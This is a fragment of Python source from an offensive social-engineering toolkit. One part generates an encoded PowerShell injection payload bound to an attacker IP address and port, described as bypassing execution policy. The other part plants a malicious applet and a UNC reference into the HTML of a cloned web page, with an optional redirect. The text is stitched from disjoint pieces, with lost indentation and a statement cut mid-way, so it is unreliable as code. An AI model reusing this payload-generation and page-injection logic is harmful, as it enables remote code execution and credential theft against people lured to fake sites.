if multi_injection == "off" and pyinjection == "off":
core.print_status("Generating x86-based powershell injection code...")
x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = core.check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
core.print_status("Printing the x86 based encoded code...")
time.sleep(3)
print(x86)
with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
filewrite.write(x86)
core.print_status("Finished generating powershell injection bypass.")
core.print_status("Encoded to bypass execution restriction policy...")
unc_database + "\n</body>",
index_database)
if not match:
index_database = re.sub("<head.*?>",
"\n<head>" + unc_database,
index_database)
counter = 0
# confirm we can find body
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub("</body.*?>",
applet_database + "\n</body>",
index_database)
check_redirect = core.check_config("AUTO_REDIRECT=")
if check_redirect.lower() == "on":
index_database = index_database.replace(
'<param name="nextPage" value=""',
'<param name="nextPage" value="%s"' % (url))
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub("<head.*?>",
"\n<head>" + applet_database,
index_database)
check_redirect = core.check_config("AUTO_REDIRECT=")
if check_redirect.lower() == "on":
index_database = index_database.replace(
'<param name="nextPage" value=""',